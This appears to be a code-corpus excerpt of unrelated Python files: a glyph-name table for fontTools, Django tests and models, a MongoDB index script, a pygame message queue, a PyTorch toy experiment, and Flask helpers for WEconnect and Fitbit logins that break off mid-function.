ANGLE QUOTATION MARK 2039;guilsinglleft;SINGLE LEFT-POINTING ANGLE QUOTATION MARK 203A;guilsinglright;SINGLE RIGHT-POINTING ANGLE QUOTATION MARK 0068;h;LATIN SMALL LETTER H 0127;hbar;LATIN SMALL LETTER H WITH STROKE 0125;hcircumflex;LATIN SMALL LETTER H WITH CIRCUMFLEX 2665;heart;BLACK HEART SUIT 0309;hookabovecomb;COMBINING HOOK ABOVE 2302;house;HOUSE 02DD;hungarumlaut;DOUBLE ACUTE ACCENT 002D;hyphen;HYPHEN-MINUS 0069;i;LATIN SMALL LETTER I 00ED;iacute;LATIN SMALL LETTER I WITH ACUTE 012D;ibreve;LATIN SMALL LETTER I WITH BREVE 00EE;icircumflex;LATIN SMALL LETTER I WITH CIRCUMFLEX 00EF;idieresis;LATIN SMALL LETTER I WITH DIAERESIS 00EC;igrave;LATIN SMALL LETTER I WITH GRAVE 0133;ij;LATIN SMALL LIGATURE IJ 012B;imacron;LATIN SMALL LETTER I WITH MACRON 221E;infinity;INFINITY 222B;integral;INTEGRAL 2321;integralbt;BOTTOM HALF INTEGRAL 2320;integraltp;TOP HALF INTEGRAL 2229;intersection;INTERSECTION 25D8;invbullet;INVERSE BULLET 25D9;invcircle;INVERSE WHITE CIRCLE 263B;invsmileface;BLACK SMILING FACE 012F;iogonek;LATIN SMALL LETTER I WITH OGONEK 03B9;iota;GREEK SMALL LETTER IOTA 03CA;iotadieresis;GREEK SMALL LETTER IOTA WITH DIALYTIKA 0390;iotadieresistonos;GREEK SMALL LETTER IOTA WITH DIALYTIKA AND TONOS 03AF;iotatonos;GREEK SMALL LETTER IOTA WITH TONOS 0129;itilde;LATIN SMALL LETTER I WITH TILDE 006A;j;LATIN SMALL LETTER J 0135;jcircumflex;LATIN SMALL LETTER J WITH CIRCUMFLEX 006B;k;LATIN SMALL LETTER K 03BA;kappa;GREEK SMALL LETTER KAPPA 0138;kgreenlandic;LATIN SMALL LETTER KRA 006C;l;LATIN SMALL LETTER L 013A;lacute;LATIN SMALL LETTER L WITH ACUTE 03BB;lambda;GREEK SMALL LETTER LAMDA 013E;lcaron;LATIN SMALL LETTER L WITH CARON 0140;ldot;LATIN SMALL LETTER L WITH MIDDLE DOT 003C;less;LESS-THAN SIGN 2264;lessequal;LESS-THAN OR EQUAL TO 258C;lfblock;LEFT HALF BLOCK 20A4;lira;LIRA SIGN 2227;logicaland;LOGICAL AND 00AC;logicalnot;NOT SIGN 2228;logicalor;LOGICAL OR 017F;longs;LATIN SMALL LETTER LONG S 25CA;lozenge;LOZENGE 0142;lslash;LATIN SMALL LETTER L WITH STROKE 2591;ltshade;LIGHT SHADE 006D;m;LATIN SMALL LETTER M 00AF;macron;MACRON 2642;male;MALE SIGN 2212;minus;MINUS SIGN 2032;minute;PRIME 00B5;mu;MICRO SIGN 00D7;multiply;MULTIPLICATION SIGN 266A;musicalnote;EIGHTH NOTE 266B;musicalnotedbl;BEAMED EIGHTH NOTES 006E;n;LATIN SMALL LETTER N 0144;nacute;LATIN SMALL LETTER N WITH ACUTE 0149;napostrophe;LATIN SMALL LETTER N PRECEDED BY APOSTROPHE 0148;ncaron;LATIN SMALL LETTER N WITH CARON 0039;nine;DIGIT NINE 2209;notelement;NOT AN ELEMENT OF 2260;notequal;NOT EQUAL TO 2284;notsubset;NOT A SUBSET OF 00F1;ntilde;LATIN SMALL LETTER N WITH TILDE 03BD;nu;GREEK SMALL LETTER NU 0023;numbersign;NUMBER SIGN 006F;o;LATIN SMALL LETTER O 00F3;oacute;LATIN SMALL LETTER O WITH ACUTE 014F;obreve;LATIN SMALL LETTER O WITH BREVE 00F4;ocircumflex;LATIN SMALL LETTER O WITH CIRCUMFLEX 00F6;odieresis;LATIN SMALL LETTER O WITH DIAERESIS 0153;oe;LATIN SMALL LIGATURE OE 02DB;ogonek;OGONEK 00F2;ograve;LATIN SMALL LETTER O WITH GRAVE 01A1;ohorn;LATIN SMALL LETTER O WITH HORN 0151;ohungarumlaut;LATIN SMALL LETTER O WITH DOUBLE ACUTE 014D;omacron;LATIN SMALL LETTER O WITH MACRON 03C9;omega;GREEK SMALL LETTER OMEGA 03D6;omega1;GREEK PI SYMBOL 03CE;omegatonos;GREEK SMALL LETTER OMEGA WITH TONOS 03BF;omicron;GREEK SMALL LETTER OMICRON 03CC;omicrontonos;GREEK SMALL LETTER OMICRON WITH TONOS 0031;one;DIGIT ONE 2024;onedotenleader;ONE DOT LEADER 215B;oneeighth;VULGAR FRACTION ONE EIGHTH 00BD;onehalf;VULGAR FRACTION ONE HALF 00BC;onequarter;VULGAR FRACTION ONE QUARTER 2153;onethird;VULGAR FRACTION ONE THIRD 25E6;openbullet;WHITE BULLET 00AA;ordfeminine;FEMININE ORDINAL INDICATOR 00BA;ordmasculine;MASCULINE ORDINAL INDICATOR 221F;orthogonal;RIGHT ANGLE 00F8;oslash;LATIN SMALL LETTER O WITH STROKE 01FF;oslashacute;LATIN SMALL LETTER O WITH STROKE AND ACUTE 00F5;otilde;LATIN SMALL LETTER O WITH TILDE 0070;p;LATIN SMALL LETTER P 00B6;paragraph;PILCROW SIGN 0028;parenleft;LEFT PARENTHESIS 0029;parenright;RIGHT PARENTHESIS 2202;partialdiff;PARTIAL DIFFERENTIAL 0025;percent;PERCENT SIGN 002E;period;FULL STOP 00B7;periodcentered;MIDDLE DOT 22A5;perpendicular;UP TACK 2030;perthousand;PER MILLE SIGN 20A7;peseta;PESETA SIGN 03C6;phi;GREEK SMALL LETTER PHI 03D5;phi1;GREEK PHI SYMBOL 03C0;pi;GREEK SMALL LETTER PI 002B;plus;PLUS SIGN 00B1;plusminus;PLUS-MINUS SIGN 211E;prescription;PRESCRIPTION TAKE 220F;product;N-ARY PRODUCT 2282;propersubset;SUBSET OF 2283;propersuperset;SUPERSET OF 221D;proportional;PROPORTIONAL TO 03C8;psi;GREEK SMALL LETTER PSI 0071;q;LATIN SMALL LETTER Q 003F;question;QUESTION MARK 00BF;questiondown;INVERTED QUESTION MARK 0022;quotedbl;QUOTATION MARK 201E;quotedblbase;DOUBLE LOW-9 QUOTATION MARK 201C;quotedblleft;LEFT DOUBLE QUOTATION MARK 201D;quotedblright;RIGHT DOUBLE QUOTATION MARK 2018;quoteleft;LEFT SINGLE QUOTATION MARK 201B;quotereversed;SINGLE HIGH-REVERSED-9 QUOTATION MARK 2019;quoteright;RIGHT SINGLE QUOTATION MARK 201A;quotesinglbase;SINGLE LOW-9 QUOTATION MARK 0027;quotesingle;APOSTROPHE 0072;r;LATIN SMALL LETTER R 0155;racute;LATIN SMALL LETTER R WITH ACUTE 221A;radical;SQUARE ROOT 0159;rcaron;LATIN SMALL LETTER R WITH CARON 2286;reflexsubset;SUBSET OF OR EQUAL TO 2287;reflexsuperset;SUPERSET OF OR EQUAL TO 00AE;registered;REGISTERED SIGN 2310;revlogicalnot;REVERSED NOT SIGN 03C1;rho;GREEK SMALL LETTER RHO 02DA;ring;RING ABOVE 2590;rtblock;RIGHT HALF BLOCK 0073;s;LATIN SMALL LETTER S 015B;sacute;LATIN SMALL LETTER S WITH ACUTE 0161;scaron;LATIN SMALL LETTER S WITH CARON 015F;scedilla;LATIN SMALL LETTER S WITH CEDILLA 015D;scircumflex;LATIN SMALL LETTER S WITH CIRCUMFLEX 2033;second;DOUBLE PRIME 00A7;section;SECTION SIGN 003B;semicolon;SEMICOLON 0037;seven;DIGIT SEVEN 215E;seveneighths;VULGAR FRACTION SEVEN EIGHTHS 2592;shade;MEDIUM SHADE 03C3;sigma;GREEK SMALL LETTER SIGMA 03C2;sigma1;GREEK SMALL LETTER FINAL SIGMA 223C;similar;TILDE OPERATOR 0036;six;DIGIT SIX 002F;slash;SOLIDUS 263A;smileface;WHITE SMILING FACE 0020;space;SPACE 2660;spade;BLACK SPADE SUIT 00A3;sterling;POUND SIGN 220B;suchthat;CONTAINS AS MEMBER 2211;summation;N-ARY SUMMATION 263C;sun;WHITE SUN WITH RAYS 0074;t;LATIN SMALL LETTER T 03C4;tau;GREEK SMALL LETTER TAU 0167;tbar;LATIN SMALL LETTER T WITH STROKE 0165;tcaron;LATIN SMALL LETTER T WITH CARON 2234;therefore;THEREFORE 03B8;theta;GREEK SMALL LETTER THETA 03D1;theta1;GREEK THETA SYMBOL 00FE;thorn;LATIN SMALL LETTER THORN 0033;three;DIGIT THREE 215C;threeeighths;VULGAR FRACTION THREE EIGHTHS 00BE;threequarters;VULGAR FRACTION THREE QUARTERS 02DC;tilde;SMALL TILDE 0303;tildecomb;COMBINING TILDE 0384;tonos;GREEK TONOS 2122;trademark;TRADE MARK SIGN 25BC;triagdn;BLACK DOWN-POINTING TRIANGLE 25C4;triaglf;BLACK LEFT-POINTING POINTER 25BA;triagrt;BLACK RIGHT-POINTING POINTER 25B2;triagup;BLACK UP-POINTING TRIANGLE 0032;two;DIGIT TWO 2025;twodotenleader;TWO DOT LEADER 2154;twothirds;VULGAR FRACTION TWO THIRDS 0075;u;LATIN SMALL LETTER U 00FA;uacute;LATIN SMALL LETTER U WITH ACUTE 016D;ubreve;LATIN SMALL LETTER U WITH BREVE 00FB;ucircumflex;LATIN SMALL LETTER U WITH CIRCUMFLEX 00FC;udieresis;LATIN SMALL LETTER U WITH DIAERESIS 00F9;ugrave;LATIN SMALL LETTER U WITH GRAVE 01B0;uhorn;LATIN SMALL LETTER U WITH HORN 0171;uhungarumlaut;LATIN SMALL LETTER U WITH DOUBLE ACUTE 016B;umacron;LATIN SMALL LETTER U WITH MACRON 005F;underscore;LOW LINE 2017;underscoredbl;DOUBLE LOW LINE 222A;union;UNION 2200;universal;FOR ALL 0173;uogonek;LATIN SMALL LETTER U WITH OGONEK 2580;upblock;UPPER HALF BLOCK 03C5;upsilon;GREEK SMALL LETTER UPSILON 03CB;upsilondieresis;GREEK SMALL LETTER UPSILON WITH DIALYTIKA 03B0;upsilondieresistonos;GREEK SMALL LETTER UPSILON WITH DIALYTIKA AND TONOS 03CD;upsilontonos;GREEK SMALL LETTER UPSILON WITH TONOS 016F;uring;LATIN SMALL LETTER U WITH RING ABOVE 0169;utilde;LATIN SMALL LETTER U WITH TILDE 0076;v;LATIN SMALL LETTER V 0077;w;LATIN SMALL LETTER W 1E83;wacute;LATIN SMALL LETTER W WITH ACUTE 0175;wcircumflex;LATIN SMALL LETTER W WITH CIRCUMFLEX 1E85;wdieresis;LATIN SMALL LETTER W WITH DIAERESIS 2118;weierstrass;SCRIPT CAPITAL P 1E81;wgrave;LATIN SMALL LETTER W WITH GRAVE 0078;x;LATIN SMALL LETTER X 03BE;xi;GREEK SMALL LETTER XI 0079;y;LATIN SMALL LETTER Y 00FD;yacute;LATIN SMALL LETTER Y WITH ACUTE 0177;ycircumflex;LATIN SMALL LETTER Y WITH CIRCUMFLEX 00FF;ydieresis;LATIN SMALL LETTER Y WITH DIAERESIS 00A5;yen;YEN SIGN 1EF3;ygrave;LATIN SMALL LETTER Y WITH GRAVE 007A;z;LATIN SMALL LETTER Z 017A;zacute;LATIN SMALL LETTER Z WITH ACUTE 017E;zcaron;LATIN SMALL LETTER Z WITH CARON 017C;zdotaccent;LATIN SMALL LETTER Z WITH DOT ABOVE 0030;zero;DIGIT ZERO 03B6;zeta;GREEK SMALL LETTER ZETA # END """ class AGLError(Exception): pass LEGACY_AGL2UV = {} AGL2UV = {} UV2AGL = {} def _builddicts(): import re lines = _aglText.splitlines() parseAGL_RE = re.compile("([A-Za-z0-9]+);((?:[0-9A-F]{4})(?: (?:[0-9A-F]{4}))*)$") for line in lines: if not line or line[:1] == '#': continue m = parseAGL_RE.match(line) if not m: raise AGLError("syntax error in glyphlist.txt: %s" % repr(line[:20])) unicodes = m.group(2) assert len(unicodes) % 5 == 4 unicodes = [int(unicode, 16) for unicode in unicodes.split()] glyphName = tostr(m.group(1)) LEGACY_AGL2UV[glyphName] = unicodes lines = _aglfnText.splitlines() parseAGLFN_RE = re.compile("([0-9A-F]{4});([A-Za-z0-9]+);.*?$") for line in lines: if not line or line[:1] == '#': continue m = parseAGLFN_RE.match(line) if not m: raise AGLError("syntax error in aglfn.txt: %s" % repr(line[:20])) unicode = m.group(1) assert len(unicode) == 4 unicode = int(unicode, 16) glyphName = tostr(m.group(2)) AGL2UV[glyphName] = unicode UV2AGL[unicode] = glyphName _builddicts() def toUnicode(glyph, isZapfDingbats=False): """Convert glyph names to Unicode, such as ``'longs_t.oldstyle'`` --> ``u'ſt'`` If ``isZapfDingbats`` is ``True``, the implementation recognizes additional glyph names (as required by the AGL specification). """ # https://github.com/adobe-type-tools/agl-specification#2-the-mapping # # 1. Drop all the characters from the glyph name starting with # the first occurrence of a period (U+002E; FULL STOP), if any. glyph = glyph.split(".", 1)[0] # 2. Split the remaining string into a sequence of components, # using underscore (U+005F; LOW LINE) as the delimiter. components = glyph.split("_") # 3. Map each component to a character string according to the # procedure below, and concatenate those strings; the result # is the character string to which the glyph name is mapped. result = [_glyphComponentToUnicode(c, isZapfDingbats) for c in components] return "".join(result) def _glyphComponentToUnicode(component, isZapfDingbats): # If the font is Zapf Dingbats (PostScript FontName: ZapfDingbats), # and the component is in the ITC Zapf Dingbats Glyph List, then # map it to the corresponding character in that list. dingbat = _zapfDingbatsToUnicode(component) if isZapfDingbats else None if dingbat: return dingbat # Otherwise, if the component is in AGL, then map it # to the corresponding character in that list. uchars = LEGACY_AGL2UV.get(component) if uchars: return "".join(map(chr, uchars)) # Otherwise, if the component is of the form "uni" (U+0075, # U+006E, and U+0069) followed by a sequence of uppercase # hexadecimal digits (0–9 and A–F, meaning U+0030 through # U+0039 and U+0041 through U+0046), if the length of that # sequence is a multiple of four, and if each group of four # digits represents a value in the ranges 0000 through D7FF # or E000 through FFFF, then interpret each as a Unicode scalar # value and map the component to the string made of those # scalar values. Note that the range and digit-length # restrictions mean that the "uni" glyph name prefix can be # used only with UVs in the Basic Multilingual Plane (BMP). uni = _uniToUnicode(component) if uni: return uni # Otherwise, if the component is of the form "u" (U+0075) # followed by a sequence of four to six uppercase hexadecimal # digits (0–9 and A–F, meaning U+0030 through U+0039 and # U+0041 through U+0046), and those digits represents a value # in the ranges 0000 through D7FF or E000 through 10FFFF, then # interpret it as a Unicode scalar value and map the component # to the string made of this scalar value. uni = _uToUnicode(component) if uni: return uni # Otherwise, map the component to an empty string. return '' # https://github.com/adobe-type-tools/agl-aglfn/blob/master/zapfdingbats.txt _AGL_ZAPF_DINGBATS = ( " ✁✂✄☎✆✝✞✟✠✡☛☞✌✍✎✏✑✒✓✔✕✖✗✘✙✚✛✜✢✣✤✥✦✧★✩✪✫✬✭✮✯✰✱✲✳✴✵✶✷✸✹✺✻✼✽✾✿❀" "❁❂❃❄❅❆❇❈❉❊❋●❍■❏❑▲▼◆❖ ◗❘❙❚❯❱❲❳❨❩❬❭❪❫❴❵❛❜❝❞❡❢❣❤✐❥❦❧♠♥♦♣ ✉✈✇" "①②③④⑤⑥⑦⑧⑨⑩❶❷❸❹❺❻❼❽❾❿➀➁➂➃➄➅➆➇➈➉➊➋➌➍➎➏➐➑➒➓➔→➣↔" "↕➙➛➜➝➞➟➠➡➢➤➥➦➧➨➩➫➭➯➲➳➵➸➺➻➼➽➾➚➪➶➹➘➴➷➬➮➱✃❐❒❮❰") def _zapfDingbatsToUnicode(glyph): """Helper for toUnicode().""" if len(glyph) < 2 or glyph[0] != 'a': return None try: gid = int(glyph[1:]) except ValueError: return None if gid < 0 or gid >= len(_AGL_ZAPF_DINGBATS): return None uchar = _AGL_ZAPF_DINGBATS[gid] return uchar if uchar != ' ' else None _re_uni = re.compile("^uni([0-9A-F]+)$") def _uniToUnicode(component): """Helper for toUnicode() to handle "uniABCD" components.""" match = _re_uni.match(component) if match is None: return None digits = match.group(1) if len(digits) % 4 != 0: return None chars = [int(digits[i : i + 4], 16) for i in range(0, len(digits), 4)] if any(c >= 0xD800 and c <= 0xDFFF for c in chars): # The AGL specification explicitly excluded surrogate pairs. return None return ''.join([chr(c) for c in chars]) _re_u = re.compile("^u([0-9A-F]{4,6})$") def _uToUnicode(component): """Helper for toUnicode() to handle "u1ABCD" components.""" match = _re_u.match(component) if match is None: return None digits = match.group(1) try: value = int(digits, 16) except ValueError: return None if ((value >= 0x0000 and value <= 0xD7FF) or (value >= 0xE000 and value <= 0x10FFFF)): return chr(value) return None
google/material-design-icons
update/venv/lib/python3.9/site-packages/fontTools/agl.py
Python
apache-2.0
112,519
from django.test import TestCase from groups import models as group_model class SimpleTest(TestCase): def test_create_group(self): """ Test group creation """ group = group_model.create_group('ateam@mechmooc.com', 'The A team', 1) self.assertTrue('address' in group) self.assertTrue('description' in group) self.assertTrue('members' in group) self.assertTrue('sequence' in group) group_copy = group_model.get_group(group['uri']) self.assertEqual(group, group_copy) def test_add_group_member(self): group = group_model.create_group('ateam@mechmooc.com', 'The A team', 1) group_model.add_group_member(group['uri'], 'bob@mail.com') group = group_model.get_group(group['uri']) self.assertEqual(len(group['members']), 1) self.assertEqual(group['members'][0], 'bob@mail.com') def test_remove_group_member(self): group = group_model.create_group('ateam@mechmooc.com', 'The A team', 1) group_model.add_group_member(group['uri'], 'bob@mail.com') group_model.add_group_member(group['uri'], 'dick@mail.com') group_model.remove_group_member(group['uri'], 'dick@mail.com') group = group_model.get_group(group['uri']) self.assertEqual(len(group['members']), 1) self.assertEqual(group['members'][0], 'bob@mail.com') def test_get_sequence_groups(self): group = group_model.create_group('group-1-1@mechmooc.com', 'The A team', 1) group = group_model.create_group('group-1-2@mechmooc.com', 'The B team', 1) group = group_model.create_group('group-1-3@mechmooc.com', 'The C team', 1) group = group_model.create_group('group-1-4@mechmooc.com', 'The D team', 1) group = group_model.create_group('group-1-5@mechmooc.com', 'The E team', 1) group = group_model.create_group('group-2-1@mechmooc.com', 'The A team', 2) group = group_model.create_group('group-2-2@mechmooc.com', 'The B team', 2) group = group_model.create_group('group-2-3@mechmooc.com', 'The C team', 2) s_1_groups = group_model.get_groups('1') self.assertIn('group-1-1@mechmooc.com', [group['address'] for group in s_1_groups]) def test_get_member_groups(self): group = group_model.create_group('ateam@mechmooc.com', 'The A team', 1) group_model.add_group_member(group['uri'], 'bob@mail.com') group = group_model.get_group(group['uri']) groups = group_model.get_member_groups('bob@mail.com') self.assertEqual(len(groups), 1) self.assertEqual(groups[0], group)
p2pu/mechanical-mooc
groups/tests.py
Python
mit
2,657
#!vpy/bin/python import pymongo import sys prod_config='/opt/slick/prodserver.cfg' config = {} with open(prod_config) as f: for line in f: if line.startswith("MONGODB_HOSTNAME"): config['MONGODB_HOSTNAME'] = line.split('=')[1].strip().strip('"') if line.startswith("MONGODB_DBNAME"): config['MONGODB_DBNAME'] = line.split('=')[1].strip().strip('"') if line.startswith("MONGODB_USERNAME"): config['MONGODB_USERNAME'] = line.split('=')[1].strip().strip('"') if line.startswith("MONGODB_PASSWORD"): config['MONGODB_PASSWORD'] = line.split('=')[1].strip().strip('"') if line.startswith("MONGODB_AUTHDB"): config['MONGODB_AUTHDB'] = line.split('=')[1].strip().strip('"') connect_options = { "host": config['MONGODB_HOSTNAME'], } if 'MONGODB_USERNAME' in config: connect_options['username'] = config['MONGODB_USERNAME'] if 'MONGODB_PASSWORD' in config: connect_options['password'] = config['MONGODB_PASSWORD'] if 'MONGODB_AUTHDB' in config: connect_options['authSource'] = config['MONGODB_AUTHDB'] client = pymongo.MongoClient(**connect_options) db = client[config['MONGODB_DBNAME']] sys.stdout.write("Creating index on projects...") sys.stdout.flush() db.projects.create_index([("name", pymongo.ASCENDING)]) sys.stdout.write("Done.\n") sys.stdout.flush() sys.stdout.write("Creating indexes on configurations...") sys.stdout.flush() db.configurations.create_index([("name", pymongo.ASCENDING)]) db.configurations.create_index([("configurationType", pymongo.ASCENDING)]) db.configurations.create_index([("filename", pymongo.ASCENDING)]) sys.stdout.write("Done.\n") sys.stdout.flush() sys.stdout.write("Creating indexes on testcases...") sys.stdout.flush() db.testcases.create_index([("automationId", pymongo.ASCENDING)]) db.testcases.create_index([("automationKey", pymongo.ASCENDING)]) db.testcases.create_index([("project.id", pymongo.ASCENDING), ("component.id", pymongo.ASCENDING)]) db.testcases.create_index([("tags", pymongo.ASCENDING)]) sys.stdout.write("Done.\n") sys.stdout.flush() sys.stdout.write("Creating indexes on results (could take a while)...") sys.stdout.flush() db.results.create_index([("runstatus", pymongo.ASCENDING), ("hostname", pymongo.ASCENDING)]) db.results.create_index([("runstatus", pymongo.ASCENDING), ("testcase.automationTool", pymongo.ASCENDING), ("recorded", pymongo.DESCENDING)]) db.results.create_index([("testrun.testrunId", pymongo.ASCENDING), ("status", pymongo.ASCENDING), ("recorded", pymongo.DESCENDING)]) db.results.create_index([("build.buildId", pymongo.ASCENDING), ("status", pymongo.ASCENDING)]) db.results.create_index([("testcase.testcaseId", pymongo.ASCENDING), ("config.configId", pymongo.ASCENDING), ("release.releaseId", pymongo.ASCENDING), ("recorded", pymongo.DESCENDING)]) db.results.create_index([("testcase.testcaseId", pymongo.ASCENDING), ("config.configId", pymongo.ASCENDING), ("release.releaseId", pymongo.ASCENDING), ("testrun.testplanId", pymongo.ASCENDING), ("recorded", pymongo.DESCENDING)]) db.results.create_index([("testcase.testcaseId", pymongo.ASCENDING), ("recorded", pymongo.DESCENDING)]) sys.stdout.write("Done.\n") sys.stdout.flush() sys.stdout.write("Creating indexes on testruns...") sys.stdout.flush() db.testruns.create_index([("project.id", pymongo.ASCENDING), ("release.releaseId", pymongo.ASCENDING)]) db.testruns.create_index([("project.id", pymongo.ASCENDING), ("dateCreated", pymongo.DESCENDING)]) db.testruns.create_index([("build.buildId", pymongo.ASCENDING), ("dateCreated", pymongo.DESCENDING)]) sys.stdout.write("Done.\n") sys.stdout.flush() sys.stdout.write("Creating index on system-configurations...") sys.stdout.flush() db['system-configurations'].create_index([("configurationType", pymongo.ASCENDING), ("name", pymongo.ASCENDING)]) sys.stdout.write("Done.\n") sys.stdout.flush() sys.stdout.write("Creating indexes on fs.chunks...") sys.stdout.flush() db['fs.chunks'].create_index([("files_id", pymongo.ASCENDING), ("n", pymongo.ASCENDING)]) sys.stdout.write("Done.\n") sys.stdout.flush() print "Should be all done now."
slickqa/slickqaweb
add-indexes.py
Python
apache-2.0
4,149
#!/usr/bin/env python3 # implementation of queue messaging system from collections import deque import pygame from wargame.message import Message from wargame.events import MessageType class MessageQueue: def __init__(self): self.queue = deque() self.listener = None def set_listener(self, listener): # call this scene to handle events self.listener = listener def add_message(self, message): # add this to the RIGHT of the queue self.queue.append(message) def add_priority_message(self, message): # priority? Add to the LEFT self.queue.appendleft(message) def handle(self): """ Handle the next message Return True to quit pygame """ # add all inputs as low priority # returns True if we quit the game if self.get_inputs(): return True if self.empty: return False # take from the LEFT of the queue message = self.queue.popleft() # send to the scene if self.listener is not None: self.listener(message) return False def get_inputs(self): # add all input events to the queue for event in pygame.event.get(): if event.type == pygame.QUIT: self.add_message(Message(MessageType.EXIT_GAME, None)) else: # timer or move? if event.type >= pygame.USEREVENT: self.add_message(Message(event.type, None)) else: self.add_message(Message(event.type, event)) return False def size(self): return len(self.queue) @property def empty(self): return len(self.queue) == 0 # singleton message system MessageSystem = MessageQueue()
maximinus/wargame
wargame/wargame/scheduler.py
Python
gpl-3.0
1,834
from django.conf import settings from django.core.urlresolvers import reverse from django.db import models from django.contrib.contenttypes.models import ContentType from django.contrib.contenttypes import generic from django.utils.translation import ugettext_lazy as _ from openbudgets.commons.mixins import models as mixins class InteractionManager(models.Manager): """Helpers for querying Interaction objects""" def of_user(self, user): """Get this user's objects for this interaction""" return self.get_query_set().filter(user=user) class Interaction(mixins.TimeStampMixin, mixins.ClassMethodMixin): """An abstract class for user-object interactions""" class Meta: abstract = True ordering = ['user', 'content_type', 'object_id'] unique_together = (('user', 'content_type', 'object_id'),) objects = InteractionManager() user = models.ForeignKey( settings.AUTH_USER_MODEL,) content_type = models.ForeignKey( ContentType, editable=False,) object_id = models.PositiveIntegerField( editable=False,) content_object = generic.GenericForeignKey( 'content_type', 'object_id',) def get_absolute_url(self): return self.content_object.get_absolute_url() def __unicode__(self): return "{user} <> {obj}".format(user=self.user, obj=self.content_object) class Star(Interaction): """Objects that are starred by users""" class Meta: verbose_name = _('star') verbose_name_plural = _('stars') class Follow(Interaction): """Objects that are followed by users""" class Meta: verbose_name = _('follow') verbose_name_plural = _('follows') class Share(Interaction): """TODO: Objects that are shared by users""" class Meta: verbose_name = _('share') verbose_name_plural = _('shares')
openbudgets/openbudgets
openbudgets/apps/interactions/models.py
Python
bsd-3-clause
1,902
# We don't know enough about neural network. # In ind_datagen.py, I will construct some extremely simplified neural network # and data sets to explore the properties of NN. # import torch import torch.nn as nn import torch.nn.functional as F from torch.utils.data import TensorDataset, DataLoader from torch.autograd import Variable import torch.optim import numpy as np from amne.amnesia import AverageMeter import time import pickle # Experiment 1 # Dimension filtering class Filter(nn.Module): def __init__(self): super(Filter, self).__init__() self.lin1=nn.Linear(100,100) self.lin2=nn.Linear(100,100) self.lin3=nn.Linear(100,1) def forward(self,input): x=self.lin1(input) x=F.relu(x) x=self.lin2(x) x=F.relu(x) x=self.lin3(x) return x def train(data_loader,model,criterion,optimizer,epoch): end=time.time() for i,(input,target) in enumerate(data_loader): input=Variable(input.cuda()) target=Variable(target.cuda()) target=target.float() output=model(input) loss=criterion(output,target) batch_loss.update(loss.data[0],input.size(0)) optimizer.zero_grad() loss.backward() optimizer.step() batch_time.update(time.time()-end) end=time.time() print_freq=10 if i%print_freq==0: print("Epoch:[{0:4}][{1:3}/{2:3}]\t" 'Time {batch_time.val:.3f} ({batch_time.avg:.3f})\t' 'Loss {loss.val:.4f} ({loss.avg:.4f})\t'.format( epoch, i, len(data_loader), batch_time=batch_time, loss=batch_loss)) if __name__=="__main__": input=np.random.normal(size=(200000,100)) target=3*input[:,0]+7*input[:,1] input=torch.Tensor(input) target=torch.FloatTensor(target) ds=TensorDataset(input,target) dl=DataLoader(ds,batch_size=1024,shuffle=True) model=Filter().cuda() criterion = nn.SmoothL1Loss().cuda() optimizer=torch.optim.Adam(model.parameters(),lr=0.001) batch_time=AverageMeter() batch_loss=AverageMeter() epochs=200 model.train() for epoch in range(epochs): train(dl,model,criterion,optimizer,epoch) pickle.dump(model.state_dict(),open("last_model_linear.pickle",'wb'))
Fuchai/Philosophy-Machine
analysis/ind_datagen.py
Python
apache-2.0
2,328
""" Contains various helpers for use by the Flask application.\n Created by Abigail Franz on 3/13/2018\.n Last modified by Abigail Franz on 5/5/2018. """ import logging, sys import json, requests from datetime import datetime, timedelta, MAXYEAR #from background import db #from app.models import Activity logging.basicConfig(stream=sys.stderr, level=logging.DEBUG) WC_URL = "https://palalinq.herokuapp.com/api/People" WC_DATE_FMT = "%Y-%m-%dT%H:%M:%S.%fZ" TODAY = datetime(datetime.now().year, datetime.now().month, datetime.now().day) def login_to_wc(email, password): """ Log user into WEconnect, produce an ID and access token that will last 90 days. Return False if the login was unsuccessful; otherwise, return the ID and token in a tuple. Assumptions: People already have a WeConnect account (email) Outcome: all successful login requests return a id, and NEW access token :param String email: the user's WEconnect username (email address) :param String password: the user's WEconnect password """ url = "{}/login".format(WC_URL) data = {"email": email, "password": password} result = requests.post(url, data=data) if result.status_code != 200: return False, () jres = result.json() wc_id = str(jres["accessToken"]["userId"]) wc_token = str(jres["accessToken"]["id"]) logging.debug("WC Login attempt returns: {}".format(wc_id)) if wc_id is None: return False, () else: return True, (wc_id, wc_token) def check_wc_token_status(wc_user_id, wc_token): logging.info("CHECKING STATUS") """ CHECK TOKEN STATUS (401 AUTH ERROR) """ url = "{}/{}?access_token={}".format(WC_URL, wc_user_id, wc_token) result = requests.get(url) logging.debug("Result: {}".format(result.status_code)) if result.status_code != 200: print("Response: {}").format("Token invalid" if result.status_code == 401 else result.status_code) return False else: print("Token for User {} is good").format(wc_user_id) return True def get_wc_activities(wc_id, wc_token): """ Pulls all of a user's activities from the WEconnect backend and parses information about them to prepare for stores. Returns a list of activity dicts :param a user's weconnect id, token """ url = "{}/{}/activities?access_token={}".format(WC_URL, wc_id, wc_token) response = requests.get(url) if response.status_code != 200: # Return an empty list if the request was unsuccessful return [] parsed = response.json() #TODO: EVERYTHING PAST HERE MODIFIED TO use WECONNECT.PY # Data to use: user, activity acts = [] for p in parsed: act = wc_json_to_db(p) acts.append(act) ''' for item in parsed: activity = wc_json_to_db(item, user) if activity.expiration > datetime.now(): # Add the activity to the database if it's unexpired. db.session.add(activity) acts.append(activity) db.session.commit() ''' return acts #def wc_json_to_db(wc_act, user): def wc_json_to_db(wc_act): """ Given a JSON activity object from WEconnect, convert it to an activity dict object compatible with the database. :param dict wc_act: an activity from WEconnect in JSON format return activity{ id, name, expiration, user=None} """ # Determine the start and end times ts = datetime.strptime(wc_act["dateStart"], WC_DATE_FMT) te = ts + timedelta(minutes=wc_act["duration"]) # Determine the expiration date (if any) expiration = datetime(MAXYEAR, 12, 31) if wc_act["repeat"] == "never": expiration = te if wc_act["repeatEnd"] != None: expiration = datetime.strptime(wc_act["repeatEnd"], WC_DATE_FMT) activity = {} activity["id"] = wc_act["activityId"] activity["name"] = wc_act["name"] activity["expiration"] = expiration activity["user"] = None #activity = Activity(wc_act_id=wc_act["activityId"], name=wc_act["name"], # expiration=expiration, user=user) return activity def complete_fb_login(fb_response): """ Extract the Fitbit access token from the response and return it, along with the PowerToken username embedded in the URL string that was sent back from Fitbit. :param dict fb_response: the data returned from Fitbit (in JSON format) """ data_utf = fb_response.decode("utf-8") data_json = json.loads(data_utf) logging.debug(data_json) return data_json["tok"], data_json["username"] def fb_updateUserGoal(fbtoken): BASE_URL = "https://api.fitbit.com/1/user/-" url = "{}/activities/goals/daily.json".format(BASE_URL) new_step_goal = 100000 params = { "period" : "daily", "type" : 